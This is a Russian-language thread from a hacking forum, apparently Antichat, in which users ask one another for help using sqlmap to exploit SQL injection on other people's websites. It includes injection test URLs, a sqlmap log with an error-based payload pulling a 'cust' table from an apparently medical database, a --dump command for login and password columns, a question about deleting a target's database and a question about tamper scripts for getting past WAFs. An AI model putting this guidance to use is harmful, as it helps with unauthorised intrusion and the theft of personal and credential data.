Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу )
    http://site.ru/search?search_id=activetopics,version()
    http://site.ru/search?search_id=activetopics+where+1=1+--+s
    http://site.ru/search?search_id=activetopics+where+1=2+--+s
     
    _________________________
  2. Metal0l

    Metal0l New Member

    Joined:
    18 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу
    я это к тому что не надо верить софту на слово
     
    _________________________
  4. Metal0l

    Metal0l New Member

    Joined:
    18 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ахах, что ж ну восьмерка есть восьмерка. Большое спасибо за помощь, буду искать дальше.
     
  5. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    web application technology: Apache
    back-end DBMS: MySQL >= 4.1
    [22:03:31] [INFO] fetching columns for table 'cust' in database 'medical-special
    ists-n'
    [22:03:31] [INFO] the SQL query used returns 36 entries
    [22:03:31] [DEBUG] suppressing possible resume console info because of large num
    ber of rows. It might take too long
    [22:03:31] [INFO] starting 10 threads
    [22:03:31] [DEBUG] performed 0 queries in 0.23 seconds
    [22:03:31] [INFO] fetching entries for table 'cust' in database 'medical-special
    ists-n'
    [22:03:31] [PAYLOAD] ' OR ROW(9489,9175)>(SELECT COUNT(*),CONCAT(0x716b706271,(S
    ELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM `medical-specialists-n`.cust),0x7
    176786b71,FLOOR(RAND(0)*2))x FROM (SELECT 2961 UNION SELECT 8568 UNION SELECT 54
    10 UNION SELECT 8661)a GROUP BY x)-- NCpp
    [22:03:31] [WARNING] the SQL query provided does not return any output
    [22:03:31] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [22:03:31] [WARNING] unable to retrieve the entries for table 'cust' in database

    Не могу сдампить пользователей,таблицы показывает,колонки тоже.А вот не дампит(((
     
  6. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Ребята, а можно как-то делитнуть базу через SQLmap?
     
  7. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    --start=10 --stop=20
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    делитнуть ведь от слова delete? если да, то start/stop тут не причет, это лимиты для запроса
    для удаления записей базы у mysql юзера должны быть соответствующие права, + если select и delete в одном запросе всё равно делать нельзя, это если скуль в select
     
    _________________________
  9. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    мануал читать
     
    t0ma5 likes this.
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    доступ к information_schema видимо нет, вот он и брутит
    если ты знаешь названия таблиц/столбцов, то нах вообще брутить?
    python sqlmap.py .... -D database -T table -C id,login,pass --dump
     
    _________________________
  12. mezik87

    mezik87 New Member

    Joined:
    31 Oct 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Всем привет, ребят столкнулся с проблемой, нужна помощь, в общем не дампит базы данных мой SqlMap, помогите в решении проблемы, мой скайп: diman_13_133
    [​IMG]
     
  13. mezik87

    mezik87 New Member

    Joined:
    31 Oct 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Так не один сайт не дампиться, один раз мне каким то чудом удалось сдампить оттуда базы, и все, опять не дампиться
     
  14. mezik87

    mezik87 New Member

    Joined:
    31 Oct 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Нет не настораживает, мне нужно решить мою проблему, вопрос почему не дампится не один сайт, и как это исправить
     
  15. mezik87

    mezik87 New Member

    Joined:
    31 Oct 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Так мне дельного совета никто и не дал, BabaDook не флуди пожалуйста, ребят кто помочь может в моей проблеме отпишите в ЛС или скайп
     
  16. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    потому что вот такая вот ботва теперь если использовать известные имена таблиц и столбцов
    http://prntscr.com/d1w125
     
  17. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    народ, всем привет, вопрос такого плана, мап раскрутил уязвиомость, но при попытке запроса бд, сваливается в таймаут или запрос проксей
    http://prntscr.com/d5eb4i
    пытался и прокси использовать и тамаут ставил больше стандартного, не особо помогло. Есть еще варианты??
     
  18. C@T

    C@T Member

    Joined:
    7 Sep 2011
    Messages:
    12
    Likes Received:
    6
    Reputations:
    10
    Допустим уязвимость была раскручена как: python sqlmap.py -r request.txt
    (в request.txt уязвимые места были помечены *)
    Как теперь заставить sqlmap при каждом запуске на домен, который был указан в request.txt работать через уже найденную скулю?
    Т.е чтобы можно было указать python sqlmap.py -u domain.com --scheme.
    Можно конечно продолжить запускать его с тем же request.txt, но если файл потерялся?
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    пошарся в корне акка, вот тут

    Code:
    $ ls ~/.sqlmap/output/[цензура]/
    dump  files  log  session.sqlite  target.txt
    
    ~/.sqlmap/output/[цензура]/log тут по идее параметры запроса есть
     
    _________________________
    C@T likes this.
  20. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    в вапе для обхода waf есть команда tamper ну и соответствующий набор скриптов под это дело, но при попытке раскрути мапом базы я не замечал что конкретно фильтруется или на что стоит обратить внимание при использовании скриптов. Или данные вещи чисто на удачу, методом перебора?